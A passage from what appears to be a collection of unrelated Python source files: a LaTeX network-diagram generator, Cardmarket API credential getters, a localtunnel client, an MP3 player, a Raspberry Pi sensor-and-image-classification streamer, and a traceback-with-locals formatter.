    if(layer["type"] == "res"):
        l = to_ResAdd(layer["id"], to)
        if(to != None): c.append(to_connection(to,layer["id"]))
        # Skip connections get a ball marker; if the source is itself a
        # residual layer, step one further back.
        if(network[int(layer["from"])]["type"]=="res"):
            fromheight = network[int(layer["from"])-1]["height"]/(HEIGHT_SCALE*2)+ int(layer["id"][-1])
            if(to != None): c.append(to_skip_ball(str(int(layer["from"])-1), layer["id"], fromheight))
        else:
            fromheight = network[int(layer["from"])]["height"]/(HEIGHT_SCALE*2)+ int(layer["id"][-1])
            if(to != None): c.append(to_skip_ball(layer["from"], layer["id"], fromheight))
    if(layer["type"]=="yolo"):
        # YOLO detection heads are collected separately and drawn last,
        # offset below the main chain.
        prev_layer = network[int(layer["id"])-1]
        new_x = str(2)#len(network)-int(layer["id"])
        new_y = str(10-int(layer["id"][-1]))
        offset = "("+new_x+",-"+new_y+",0)"
        yolo = to_SoftMax(layer["id"], str(int(prev_layer["height"])), to = "("+network[-2]["id"]+"-east)", offset=offset,height=prev_layer["height"]/HEIGHT_SCALE,depth=prev_layer["depth"]/HEIGHT_SCALE, width=float(42)/WIDTH_SCALE)
        yolos.append(to_connection_yolo(to,layer["id"]))
        yolos.append(yolo)
        # Reset so the next layer does not connect to the yolo head.
        to=None
    if(layer["type"] == "route"):
        fromheight = 5 #network[int(layer["id"])-1]["height"]/(HEIGHT_SCALE*2)
        l = to_ResConcat(layer["id"], to_east)
        c.append(to_skip_ball(layer["c1"],layer["id"],fromheight))
        if(layer["c2"] is not None):
            # NOTE(review): `id` shadows the builtin here.
            id = layer["c2"]
            if (network[int(id)]["type"]=="res"): id = str(int(id)-1)
            c.append(to_skip_ball(id,layer["id"],fromheight + int(layer["id"][:1])))
    if(l is not None):
        # Advance the chain anchor to the node we just emitted.
        to = layer["id"]
        to_east = "("+to+"-east)"
        arch2.append(l)
    if c is not None:
        for e in c:
            arch2.append(e)

# Draw the detection heads last (reversed for stacking order).
yolos.reverse()
for e in yolos:
    arch2.append(e)
#c = to_connection(network[i-1]["id"],layer["id"]),
#arch2.append(c)
arch2.append(to_end())

# defined your arch — small hand-written example architecture (unused by
# main(), which renders arch2).
arch = [
    to_head( '..' ),
    to_cor(),
    to_begin(),
    to_Conv("conv1", 512, 64, offset="(0,0,0)", to="(0,0,0)", height=64, depth=64, width=2 ),
    to_Pool("pool1", offset="(0,0,0)", to="(conv1-east)"),
    to_Conv("conv2", 128, 64, offset="(1,0,0)", to="(pool1-east)", height=32, depth=32, width=2 ),
    to_connection( "pool1", "conv2"),
    to_Pool("pool2", offset="(0,0,0)", to="(conv2-east)", height=28, depth=28, width=1),
    to_SoftMax("soft1", 10 ,"(3,0,0)", "(pool1-east)", caption="SOFT" ),
    to_connection("pool2", "soft1"),
    to_end()
    ]
def main():
    """Render the generated architecture (arch2) to a .tex file named
    after this script."""
    import os.path
    # Fix: str(sys.argv[0]).split('.')[0] breaks on paths containing
    # other dots (e.g. "./plot.py" -> ""); splitext strips only the
    # final extension.
    namefile = os.path.splitext(str(sys.argv[0]))[0]
    to_generate(arch2, namefile + '.tex')

if __name__ == '__main__':
    main()
|
python
|
import os
from mkmapi.exceptions import MissingEnvVar
def _get_env_var(key):
try:
return os.environ[key]
except KeyError:
raise MissingEnvVar(key)
def get_mkm_app_token():
    # App token issued by MKM, read from the MKM_APP_TOKEN env var.
    return _get_env_var('MKM_APP_TOKEN')
def get_mkm_app_secret():
    # App secret issued by MKM, read from the MKM_APP_SECRET env var.
    return _get_env_var('MKM_APP_SECRET')
def get_mkm_access_token():
    # OAuth access token, read from the MKM_ACCESS_TOKEN env var.
    return _get_env_var('MKM_ACCESS_TOKEN')
def get_mkm_access_token_secret():
    # OAuth access token secret, read from MKM_ACCESS_TOKEN_SECRET.
    return _get_env_var('MKM_ACCESS_TOKEN_SECRET')
def get_mkm_base_url(sandbox=False):
    """Return the MKM API base URL (sandbox host when *sandbox* is true)."""
    host = 'sandbox.cardmarket.com' if sandbox else 'api.cardmarket.com'
    return 'https://' + host + '/ws/v2.0/output.json'
|
python
|
import argparse
import uuid
import sys
import socket
import eventlet
import eventlet.event
import eventlet.greenpool
from localtunnel import util
from localtunnel import protocol
from localtunnel import __version__
def open_proxy_backend(backend, target, name, client, use_ssl=False, ssl_opts=None):
    # Open one proxy connection to the tunnel backend and, once the
    # server grants it, splice it onto a fresh connection to the local
    # target service. (Python 2 / eventlet code.)
    proxy = eventlet.connect(backend)
    if use_ssl:
        ssl_opts = ssl_opts or {}
        proxy = eventlet.wrap_ssl(proxy, server_side=False, **ssl_opts)
    proxy.sendall(protocol.version)
    protocol.send_message(proxy,
        protocol.proxy_request(
            name=name,
            client=client,
        ))
    reply = protocol.recv_message(proxy)
    if reply and 'proxy' in reply:
        try:
            local = eventlet.connect(target)
            util.join_sockets(proxy, local)
        except IOError:
            # Local target unavailable: drop the proxy side as well.
            proxy.close()
    elif reply and 'error' in reply:
        print " ERROR: {0}".format(reply['error'])
        return
    else:
        # Unknown reply: silently give up on this proxy connection.
        pass
def start_client(**kwargs):
    # Establish the control connection to the tunnel server, keep a pool
    # of proxy backends open, and answer keepalive pings until the
    # control channel drops. (Python 2 / eventlet code.)
    host = kwargs['host']
    backend_port = kwargs.get('backend_port')
    use_ssl = kwargs.get('use_ssl', False)
    ssl_opts = kwargs.get('ssl_opts', {})
    if not backend_port:
        # NOTE(review): bare except hides the real connection error.
        try:
            backend_port = util.discover_backend_port(host)
        except:
            print " ERROR: Unable to connect to service."
            sys.exit(0)
    frontend_ip = socket.gethostbyname(host.split(':')[0])
    frontend_address, frontend_hostname = util.parse_address(host,
        default_ip=frontend_ip)
    backend = (frontend_address[0], backend_port)
    name = kwargs['name']
    client = util.client_name()
    target = util.parse_address(kwargs['target'])[0]
    try:
        control = eventlet.connect(backend)
        if use_ssl:
            control = eventlet.wrap_ssl(control, server_side=False, **ssl_opts)
        control.sendall(protocol.version)
        protocol.send_message(control,
            protocol.control_request(
                name=name,
                client=client,
            ))
        reply = protocol.recv_message(control)
        if reply and 'control' in reply:
            reply = reply['control']
            # Keep the server-requested number of proxy connections open;
            # the pool blocks once 'concurrency' greenlets are active.
            def maintain_proxy_backend_pool():
                pool = eventlet.greenpool.GreenPool(reply['concurrency'])
                while True:
                    pool.spawn_n(open_proxy_backend,
                        backend, target, name, client, use_ssl, ssl_opts)
            proxying = eventlet.spawn(maintain_proxy_backend_pool)
            print " {0}".format(reply['banner'])
            print " Port {0} is now accessible from http://{1} ...\n".format(
                target[1], reply['host'])
            # Ping/pong keepalive loop; any I/O or protocol mismatch
            # tears the proxy pool down.
            try:
                while True:
                    message = protocol.recv_message(control)
                    assert message == protocol.control_ping()
                    protocol.send_message(control, protocol.control_pong())
            except (IOError, AssertionError):
                proxying.kill()
        elif reply and 'error' in reply:
            print " ERROR: {0}".format(reply['message'])
        else:
            print " ERROR: Unexpected server reply."
            print " Make sure you have the latest version of the client."
    except KeyboardInterrupt:
        pass
def run():
    """Command-line entry point: parse arguments and start the tunnel client."""
    parser = argparse.ArgumentParser(
        description='Open a public HTTP tunnel to a local server')
    parser.add_argument('-s', dest='host', metavar='address',
            default='v2.localtunnel.com',
            help='localtunnel server address (default: v2.localtunnel.com)')
    parser.add_argument('--version', action='store_true',
            help='show version information for client and server')
    parser.add_argument('-m', action='store_true',
            help='show server metrics and exit')
    # --version and -m are parsed before the required positional 'target'
    # is registered, so they work without a target argument.
    if '--version' in sys.argv:
        args = parser.parse_args()
        print "client: {}".format(__version__)
        try:
            server_version = util.lookup_server_version(args.host)
        except:  # NOTE(review): bare except; any failure shows '??'
            server_version = '??'
        print "server: {} ({})".format(server_version, args.host)
        sys.exit(0)
    elif '-m' in sys.argv:
        args = parser.parse_args()
        util.print_server_metrics(args.host)
        sys.exit(0)
    parser.add_argument('-n', dest='name', metavar='name',
            default=str(uuid.uuid4()).split('-')[-1],
            help='name of the tunnel (default: randomly generate)')
    parser.add_argument('-c', dest='concurrency', type=int,
            metavar='concurrency', default=3,
            help='number of concurrent backend connections')
    parser.add_argument('target', metavar='target', type=str,
            help='local target port or address of server to tunnel to')
    args = parser.parse_args()
    start_client(**vars(args))
if __name__ == '__main__':
    run()
|
python
|
# MP3
# Play a local MP3 file with pygame's mixer and wait for it to finish.
import selenium  # NOTE(review): unused here; kept in case later code needs it
import pygame
pygame.init()
pygame.mixer.init()
pygame.mixer.music.load('c:/Users/wmarc/OneDrive/Documentos/UNIVESP/Curso em Video/Desafio_021.mp3')
pygame.mixer.music.play()
# BUG FIX: pygame.event.wait() blocks on the event queue (and needs a video
# display to receive events); it does not wait for playback to end, so the
# script could exit early or hang.  Poll the mixer until the track finishes.
while pygame.mixer.music.get_busy():
    pygame.time.wait(100)
|
python
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import argparse
import os.path
import re
import sys
import tarfile
import os
import datetime
import math
import random, string
import base64
import json
import time
from time import sleep
from time import gmtime, strftime
import numpy as np
from six.moves import urllib
import tensorflow as tf
import sys
import datetime
import subprocess
import os
import base64
import uuid
import datetime
import traceback
import math
import random, string
import socket
import base64
import json
import cv2
import math
import time
import psutil
import socket
from time import gmtime, strftime
from luma.core.interface.serial import i2c
from luma.core.render import canvas
from luma.oled.device import sh1106
#
# Sensors
#
from bh1745 import BH1745
import VL53L1X
import ltr559
import bme680
from lsm303d import LSM303D
# Quiet TensorFlow's default INFO/WARN logging.
tf.logging.set_verbosity(tf.logging.ERROR)
FLAGS = None
# pylint: disable=line-too-long
DATA_URL = 'http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz'
# pylint: enable=line-too-long
# yyyy-mm-dd hh:mm:ss
currenttime= strftime("%Y-%m-%d %H:%M:%S",gmtime())
# Short hostname of this device (uname nodename).
host = os.uname()[1]
def randomword(length):
  """Return a random lowercase ASCII string of the given length."""
  # BUG FIX: string.lowercase exists only on Python 2; string.ascii_lowercase
  # is available on both Python 2 and 3 and is equivalent for ASCII.
  return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))
class NodeLookup(object):
  """Converts integer node ID's to human readable labels."""
  def __init__(self,
               label_lookup_path=None,
               uid_lookup_path=None):
    # Defaults point at the Inception metadata extracted into /tmp/imagenet
    # by maybe_download_and_extract().
    if not label_lookup_path:
      label_lookup_path = os.path.join(
          '/tmp/imagenet', 'imagenet_2012_challenge_label_map_proto.pbtxt')
    if not uid_lookup_path:
      uid_lookup_path = os.path.join(
          '/tmp/imagenet', 'imagenet_synset_to_human_label_map.txt')
    self.node_lookup = self.load(label_lookup_path, uid_lookup_path)
  def load(self, label_lookup_path, uid_lookup_path):
    """Loads a human readable English name for each softmax node.
    Args:
      label_lookup_path: string UID to integer node ID.
      uid_lookup_path: string UID to human-readable string.
    Returns:
      dict from integer node ID to human-readable string.
    """
    if not tf.gfile.Exists(uid_lookup_path):
      tf.logging.fatal('File does not exist %s', uid_lookup_path)
    if not tf.gfile.Exists(label_lookup_path):
      tf.logging.fatal('File does not exist %s', label_lookup_path)
    # Loads mapping from string UID to human-readable string
    proto_as_ascii_lines = tf.gfile.GFile(uid_lookup_path).readlines()
    uid_to_human = {}
    # Each line looks like "n00004475<TAB>organism, being"; the pattern
    # splits it into the synset id and the description.
    p = re.compile(r'[n\d]*[ \S,]*')
    for line in proto_as_ascii_lines:
      parsed_items = p.findall(line)
      uid = parsed_items[0]
      human_string = parsed_items[2]
      uid_to_human[uid] = human_string
    # Loads mapping from string UID to integer node ID.
    node_id_to_uid = {}
    proto_as_ascii = tf.gfile.GFile(label_lookup_path).readlines()
    for line in proto_as_ascii:
      if line.startswith('  target_class:'):
        target_class = int(line.split(': ')[1])
      if line.startswith('  target_class_string:'):
        target_class_string = line.split(': ')[1]
        # [1:-2] strips the surrounding quotes and trailing newline.
        node_id_to_uid[target_class] = target_class_string[1:-2]
    # Loads the final mapping of integer node ID to human-readable string
    node_id_to_name = {}
    for key, val in node_id_to_uid.items():
      if val not in uid_to_human:
        tf.logging.fatal('Failed to locate: %s', val)
      name = uid_to_human[val]
      node_id_to_name[key] = name
    return node_id_to_name
  def id_to_string(self, node_id):
    """Return the human-readable label for node_id ('' if unknown)."""
    if node_id not in self.node_lookup:
      return ''
    return self.node_lookup[node_id]
def create_graph():
  """Load the saved Inception GraphDef and import it into the default graph."""
  graph_path = os.path.join('/tmp/imagenet', 'classify_image_graph_def.pb')
  with tf.gfile.FastGFile(graph_path, 'rb') as graph_file:
    graph_def = tf.GraphDef()
    graph_def.ParseFromString(graph_file.read())
    _ = tf.import_graph_def(graph_def, name='')
def run_inference_on_image(image):
  """Runs Inception inference on an image.
  Args:
    image: Image file name (JPEG).
  Returns:
    Dict with 'human_string' (top-1 label) and 'score' (its confidence),
    both stringified.
  """
  if not tf.gfile.Exists(image):
    tf.logging.fatal('File does not exist %s', image)
  image_data = tf.gfile.FastGFile(image, 'rb').read()
  # Creates graph from saved GraphDef.
  # NOTE(review): called per image; when invoked in a loop this re-imports
  # the model into the default graph on every call.
  create_graph()
  with tf.Session() as sess:
    # Some useful tensors:
    # 'softmax:0': A tensor containing the normalized prediction across
    #   1000 labels.
    # 'pool_3:0': A tensor containing the next-to-last layer containing 2048
    #   float description of the image.
    # 'DecodeJpeg/contents:0': A tensor containing a string providing JPEG
    #   encoding of the image.
    # Runs the softmax tensor by feeding the image_data as input to the graph.
    softmax_tensor = sess.graph.get_tensor_by_name('softmax:0')
    predictions = sess.run(softmax_tensor,
                           {'DecodeJpeg/contents:0': image_data})
    predictions = np.squeeze(predictions)
    # Creates node ID --> English string lookup.
    node_lookup = NodeLookup()
    tfrow = { }
    # argsort()[-1] is the index of the highest-scoring class (top-1).
    top_k = predictions.argsort()[-1]
    human_string = node_lookup.id_to_string(top_k)
    score = predictions[top_k]
    tfrow['human_string'] = str(human_string)
    tfrow['score'] = str(score)
    return tfrow
def maybe_download_and_extract():
  """Download and extract model tar file (skips download if already cached)."""
  dest_directory = '/tmp'
  if not os.path.exists(dest_directory):
    os.makedirs(dest_directory)
  filename = DATA_URL.split('/')[-1]
  filepath = os.path.join(dest_directory, filename)
  if not os.path.exists(filepath):
    # Stream the tarball down with a simple carriage-return progress meter.
    def _progress(count, block_size, total_size):
      sys.stdout.write('\r>> Downloading %s %.1f%%' % (
          filename, float(count * block_size) / float(total_size) * 100.0))
      sys.stdout.flush()
    filepath, _ = urllib.request.urlretrieve(DATA_URL, filepath, _progress)
    print()
    statinfo = os.stat(filepath)
    print('Successfully downloaded', filename, statinfo.st_size, 'bytes.')
  # NOTE(review): extractall trusts the archive's member paths; acceptable
  # for this fixed Google URL, unsafe for arbitrary archives.
  tarfile.open(filepath, 'r:gz').extractall(dest_directory)
  # TODO: send status message to screen
# TODO: send status message to screen
def do_nothing(obj):
  """No-op stand-in (used to disable luma's OLED cleanup-on-exit hook)."""
  return None
def send_tcp(s, message):
  """Best-effort send of message on the connected socket s.

  Failures are reported but deliberately not raised, so one failed send
  does not kill the sensor loop.
  """
  try:
    s.sendall(message)
  except socket.error as err:
    # BUG FIX: was a bare ``except`` that also swallowed KeyboardInterrupt
    # and SystemExit, and discarded the error; narrow to socket errors
    # (socket.error is OSError on Python 3) and report what went wrong.
    print("Failed to send message: {0}".format(err))
def IP_address():
  """Return this host's outbound IP address, or None when lookup fails.

  Opens a UDP "connection" to a public root server; no packet is actually
  sent, but the OS chooses the local address it would use, which we read
  back via getsockname().
  """
  try:
    probe = socket.socket(socket_family, socket.SOCK_DGRAM)
    probe.connect(external_IP_and_port)
    local_addr = probe.getsockname()
    probe.close()
    return local_addr[0] if local_addr else None
  except socket.error:
    return None
def getCPUtemperature():
  """Read the Raspberry Pi SoC temperature via vcgencmd (string, Celsius)."""
  raw = os.popen('vcgencmd measure_temp').readline()
  # Output looks like "temp=47.2'C\n"; strip the wrapper, keep the number.
  return(raw.replace("temp=","").replace("'C\n",""))
# - start timing
starttime = datetime.datetime.now().strftime('%m/%d/%Y %H:%M:%S')
start = time.time()
# Target used only to learn our own outbound address (see IP_address()).
external_IP_and_port = ('198.41.0.4', 53) # a.root-servers.net
socket_family = socket.AF_INET
# Set up OLED
oled = sh1106(i2c(port=1, address=0x3C), rotate=2, height=128, width=128)
# Keep the display contents on exit instead of luma's default clear.
oled.cleanup = do_nothing
# Set Constants
MAX_DISTANCE_MM = 800 # Distance at which our bar is full
TRIGGER_DISTANCE_MM = 80
# Ip address
ipaddress = IP_address()
# options
# 1 - read each sensor once per full call
# 2 - have app stream sensor values to MiniFi via File, TCP, MQTT, REST
# bh1745
bh1745 = BH1745()
bh1745.setup()
bh1745.set_leds(1)
r, g, b, c = bh1745.get_rgbc_raw()
bh1745.set_leds(0)
# VL53L1X
tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=0x29)
tof.open() # Initialise the i2c bus and configure the sensor
tof.start_ranging(2) # Start ranging, 1 = Short Range, 2 = Medium Range, 3 = Long Range
# NOTE(review): ranging is stopped before the first read; confirm
# get_distance() still returns a valid value after stop_ranging().
tof.stop_ranging() # Stop ranging
distance_in_mm = tof.get_distance() # Grab the range in mm
distance_in_mm = min(MAX_DISTANCE_MM, distance_in_mm) # Cap at our MAX_DISTANCE
# ltr559
lux = ltr559.get_lux()
prox = ltr559.get_proximity()
# bme680
# The BME680 may sit at either I2C address depending on wiring.
try:
    sensor = bme680.BME680(bme680.I2C_ADDR_PRIMARY)
except IOError:
    sensor = bme680.BME680(bme680.I2C_ADDR_SECONDARY)
sensor.set_humidity_oversample(bme680.OS_2X)
sensor.set_pressure_oversample(bme680.OS_4X)
sensor.set_temperature_oversample(bme680.OS_8X)
sensor.set_filter(bme680.FILTER_SIZE_3)
sensor.set_gas_status(bme680.ENABLE_GAS_MEAS)
sensor.set_gas_heater_temperature(320)
sensor.set_gas_heater_duration(150)
sensor.select_gas_heater_profile(0)
# lsm303d
lsm = LSM303D(0x1d)
lsm3accl = lsm.accelerometer()
lsm3mag = lsm.magnetometer()
TCP_PORT = 5005 # define somewhere
# Stream JSON rows to a listener (MiniFi) on this same host.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ipaddress, TCP_PORT))
# tensorflow model
maybe_download_and_extract()
# start camera
time.sleep(0.5)
cap = cv2.VideoCapture(0)
time.sleep(3)
# loop forever
try:
  while True:
    row = { }
    # Fresh sensor readings for this iteration.
    distance_in_mm = tof.get_distance() # Grab the range in mm
    distance_in_mm = min(MAX_DISTANCE_MM, distance_in_mm) # Cap at our MAX_DISTANCE
    lsm3accl = lsm.accelerometer()
    lsm3mag = lsm.magnetometer()
    lux = ltr559.get_lux()
    prox = ltr559.get_proximity()
    bh1745.set_leds(1)
    r, g, b, c = bh1745.get_rgbc_raw()
    bh1745.set_leds(0)
    # Capture a frame and save it under a unique, time-sortable name.
    ret, frame = cap.read()
    uuid2 = '{0}_{1}'.format(strftime("%Y%m%d%H%M%S",gmtime()),uuid.uuid4())
    filename = 'images/bog_image_{0}.jpg'.format(uuid2)
    filename2 = 'images/bog_image_p_{0}.jpg'.format(uuid2)
    cv2.imwrite(filename, frame)
    cpuTemp=int(float(getCPUtemperature()))
    # Classify the saved frame (rebuilds the TF graph each call -- slow).
    tfrow = run_inference_on_image(filename)
    end = time.time()
    row['human_string'] = tfrow['human_string']
    row['score'] = tfrow['score']
    row['imgname'] = filename
    row['imgnamep'] = filename2
    row['host'] = os.uname()[1]
    row['cputemp'] = round(cpuTemp,2)
    row['ipaddress'] = ipaddress
    row['end'] = '{0}'.format( str(end ))
    row['te'] = '{0}'.format(str(end-start))
    row['BH1745_red'] = '{:3.1f}'.format(r)
    row['BH1745_green'] = '{:3.1f}'.format(g)
    row['BH1745_blue'] = '{:3.1f}'.format(b)
    row['BH1745_clear'] = '{:3.1f}'.format(c)
    row['VL53L1X_distance_in_mm'] = distance_in_mm
    row['ltr559_lux'] = '{:06.2f}'.format(lux)
    row['ltr559_prox'] = '{:04d}'.format(prox)
    # NOTE(review): sensor.data is read without calling get_sensor_data()
    # first; confirm the driver refreshes .data automatically.
    row['bme680_tempc'] = '{0:.2f}'.format(sensor.data.temperature)
    row['bme680_tempf'] = '{0:.2f}'.format((sensor.data.temperature * 1.8) + 32)
    row['bme680_pressure'] = '{0:.2f}'.format(sensor.data.pressure)
    row['bme680_humidity'] = '{0:.3f}'.format(sensor.data.humidity)
    row['lsm303d_accelerometer'] = "{:+06.2f}g : {:+06.2f}g : {:+06.2f}g".format(*lsm3accl)
    row['lsm303d_magnetometer'] = "{:+06.2f} : {:+06.2f} : {:+06.2f}".format(*lsm3mag)
    row['systemtime'] = datetime.datetime.now().strftime('%m/%d/%Y %H:%M:%S')
    row['starttime'] = starttime
    usage = psutil.disk_usage("/")
    row['diskusage'] = "{:.1f}".format(float(usage.free) / 1024 / 1024)
    row['memory'] = psutil.virtual_memory().percent
    row['uuid'] = str(uuid2)
    # One newline-terminated JSON document per iteration.
    # NOTE(review): send_tcp is given a str; on Python 3 sockets require
    # bytes -- confirm which interpreter runs this.
    json_string = json.dumps(row)
    json_string += str("\n")
    send_tcp(s,json_string)
    json_string = ""
    # Mirror the key readings on the local OLED.
    with canvas(oled) as draw:
      draw.rectangle(oled.bounding_box, outline="white", fill="black")
      draw.text((0, 0), "- Apache NiFi MiniFi -", fill="white")
      draw.text((0, 10), ipaddress, fill="white")
      draw.text((0, 20), starttime, fill="white")
      draw.text((0, 30), 'Temp: {}'.format( sensor.data.temperature ), fill="white")
      draw.text((0, 40), 'Humidity: {}'.format( sensor.data.humidity ), fill="white")
      draw.text((0, 50), 'Pressure: {}'.format( sensor.data.pressure ), fill="white")
      draw.text((0, 60), 'Distance: {}'.format(str(distance_in_mm)), fill="white")
      draw.text((0, 70), 'CPUTemp: {}'.format( cpuTemp ), fill="white")
      draw.text((0, 80), 'TempF: {}'.format( row['bme680_tempf'] ), fill="white")
      draw.text((0, 90), 'A: {}'.format(row['lsm303d_accelerometer']), fill="white")
      draw.text((0, 100), 'M: {}'.format(row['lsm303d_magnetometer']), fill="white")
      draw.text((0, 110), 'DU: {}'.format(row['diskusage']), fill="white")
    time.sleep(0.5)
# NOTE(review): bare except silently ends the loop on ANY error (including
# Ctrl-C) with a message that does not reflect the actual failure.
except:
  print("Fail to send.")
|
python
|
#
# Copyright (c) SAS Institute, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
"""
Methods for formatting "extended" tracebacks with locals.
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import os
import sys
import types
import inspect
import itertools
import linecache
from six.moves import xmlrpc_client
from six.moves.reprlib import Repr
# The blacklists below differ because the xmlrpc/types names changed
# between Python 2 and Python 3.
if (sys.version_info > (3, 0)):
    # Python 3 code in this block
    # Types for which calling __safe_str__ has side effects
    UNSAFE_TYPES = (
        xmlrpc_client.ServerProxy,
        xmlrpc_client._Method,
    )
    # Types that should not appear in the output at all
    IGNORED_TYPES = (
        types.FunctionType,
        types.ModuleType,
    )
else:
    # Python 2 code in this block
    # Types for which calling __safe_str__ has side effects
    UNSAFE_TYPES = (
        xmlrpc_client.ServerProxy,
        xmlrpc_client.MethodType,
    )
    # Types that should not appear in the output at all
    IGNORED_TYPES = (
        types.ClassType,
        types.FunctionType,
        types.ModuleType,
        types.TypeType,
    )
# Set for consumers to hook into for black listing their own classes.
UNSAFE_TYPE_NAMES = set()
class TraceRepr(Repr):
    """Repr subclass tuned for tracebacks: raised size limits plus an
    optional multi-line ("pretty") layout for long collections."""
    def __init__(self, subsequentIndent=""):
        Repr.__init__(self)
        # Raise the stdlib Repr limits so locals are not over-truncated.
        self.maxtuple = 20
        self.maxset = 160
        self.maxlist = 20
        self.maxdict = 20
        self.maxstring = 1600
        self.maxother = 160
        # Joined output longer than this wraps one element per line.
        self.maxLineLen = 160
        # Prefix applied to wrapped continuation lines.
        self.subsequentIndent = subsequentIndent
        # Pretty-print?
        self._pretty = True
    def _pretty_repr(self, pieces, iterLen, level):
        # Join on one line when it fits (or prettying is disabled);
        # otherwise one element per line, indented by recursion depth.
        ret = ', '.join(pieces)
        if not self._pretty or len(ret) < self.maxLineLen:
            return ret
        padding = self.subsequentIndent + " " * (self.maxlevel - level)
        sep = ',\n' + padding
        return '\n' + padding + sep.join(pieces)
    def _repr_iterable(self, obj, level, left, right, maxiter, trail=''):
        # Shared body for sequence reprs: elide elements past maxiter and
        # everything once the recursion budget (level) is spent.
        n = len(obj)
        if level <= 0 and n:
            out = '...len=%d...' % n
        else:
            newlevel = level - 1
            repr1 = self.repr1
            pieces = [repr1(elem, newlevel)
                for elem in itertools.islice(obj, maxiter)]
            if n > maxiter:
                pieces.append('...len=%d...' % n)
            out = self._pretty_repr(pieces, n, level)
        if n == 1 and trail:
            # e.g. the trailing comma of a 1-tuple.
            right = trail + right
        return '%s%s%s' % (left, out, right)
    def repr_dict(self, obj, level):
        n = len(obj)
        if n == 0:
            return '{}'
        if level <= 0:
            return '{...len=%d...}' % n
        newlevel = level - 1
        repr1 = self.repr1
        pieces = []
        for key in itertools.islice(sorted(obj), self.maxdict):
            # Keys are rendered on one line even in pretty mode.
            oldPretty = self._pretty
            self._pretty = False
            keyrepr = repr1(key, newlevel)
            self._pretty = oldPretty
            # Values may wrap; deepen the continuation indent while
            # rendering them.
            oldSubsequentIndent = self.subsequentIndent
            self.subsequentIndent += ' ' * 4
            valrepr = repr1(obj[key], newlevel)
            self.subsequentIndent = oldSubsequentIndent
            pieces.append('%s: %s' % (keyrepr, valrepr))
        if n > self.maxdict:
            pieces.append('...len=%d...' % n)
        out = self._pretty_repr(pieces, n, level)
        return '{%s}' % (out,)
def shouldSafeStr(obj):
    """Return True when obj exposes a callable __safe_str__ we may invoke.

    Objects of blacklisted types (UNSAFE_TYPES / UNSAFE_TYPE_NAMES) are
    rejected because calling __safe_str__ on them has side effects.
    """
    if hasattr(types, 'InstanceType') and isinstance(obj, types.InstanceType):
        # Python 2 old-style instance: type(obj) would just be InstanceType.
        cls = obj.__class__
    else:
        # New-style instances and non-instances
        cls = type(obj)
    if isinstance(obj, UNSAFE_TYPES):
        return False
    if cls.__name__ in UNSAFE_TYPE_NAMES:
        return False
    # getattr default of None is never callable, so this covers both the
    # "missing attribute" and "attribute is not callable" cases.
    return callable(getattr(obj, '__safe_str__', None))
def formatCode(frame, stream):
    """Write one 'File ..., line N, in func' entry (plus source line) for frame.

    linecache.updatecache is temporarily replaced so that only files that
    are readable at their exact path are consulted; this stops linecache
    from finding an unrelated module on sys.path that happens to share the
    source file's name.
    """
    realUpdatecache = linecache.updatecache
    def guardedUpdatecache(*args):
        # Require an exact, readable path before delegating to linecache.
        if not os.access(args[0], os.R_OK):
            return []
        return realUpdatecache(*args)
    linecache.updatecache = guardedUpdatecache
    try:
        try:
            frameInfo = inspect.getframeinfo(frame, context=1)
        except:  # noqa
            # Retry without source context when the file cannot be read.
            frameInfo = inspect.getframeinfo(frame, context=0)
        fileName, lineNo, funcName, text, idx = frameInfo
        stream.write(' File "%s", line %d, in %s\n' %
            (fileName, lineNo, funcName))
        if text is not None and len(text) > idx:
            # Source may be unavailable; only print when we got the line.
            stream.write(' %s\n' % text[idx].strip())
    finally:
        # Always restore the real linecache hook.
        linecache.updatecache = realUpdatecache
def formatLocals(frame, stream):
    """Write one 'name : value' line per local variable of frame.

    Dunder names and uninteresting types (IGNORED_TYPES) are skipped;
    values that cannot be rendered are reported with their type and the
    exception class instead of aborting the dump.
    """
    prettyRepr = TraceRepr(subsequentIndent=" " * 27).repr
    for name, obj in sorted(frame.f_locals.items()):
        isDunder = name.startswith('__') and name.endswith('__')
        if isDunder or isinstance(obj, IGNORED_TYPES):
            # Internal data / functions, modules, etc. -- not interesting.
            continue
        try:
            if shouldSafeStr(obj):
                vstr = obj.__safe_str__()
            else:
                vstr = prettyRepr(obj)
        except Exception as error:
            # Could not build a repr; still show the type and the error.
            if hasattr(types, 'InstanceType') \
                    and isinstance(obj, types.InstanceType):
                typeName = obj.__class__.__name__
            else:
                typeName = type(obj).__name__
            vstr = '** unrepresentable object of type %r (error: %s) **' % (
                typeName, error.__class__.__name__)
        stream.write(" %15s : %s\n" % (name, vstr))
def stackToList(stack):
    """
    Convert a chain of traceback or frame objects into a list of frames.

    Tracebacks are first walked to their innermost entry, so the result
    always starts at the deepest frame and follows f_back outward.
    """
    if isinstance(stack, types.TracebackType):
        # Descend to the innermost traceback entry, then take its frame.
        while stack.tb_next is not None:
            stack = stack.tb_next
        stack = stack.tb_frame
    frames = []
    while stack is not None:
        frames.append(stack)
        stack = stack.f_back
    return frames
def formatTrace(excType, excValue, excTB, stream=sys.stderr, withLocals=True):
    """Write an extended traceback for the given exception to stream.

    With locals enabled, frames are printed innermost-first and each frame
    is followed by its locals and a separator; otherwise the conventional
    outermost-first order is used with no locals.
    """
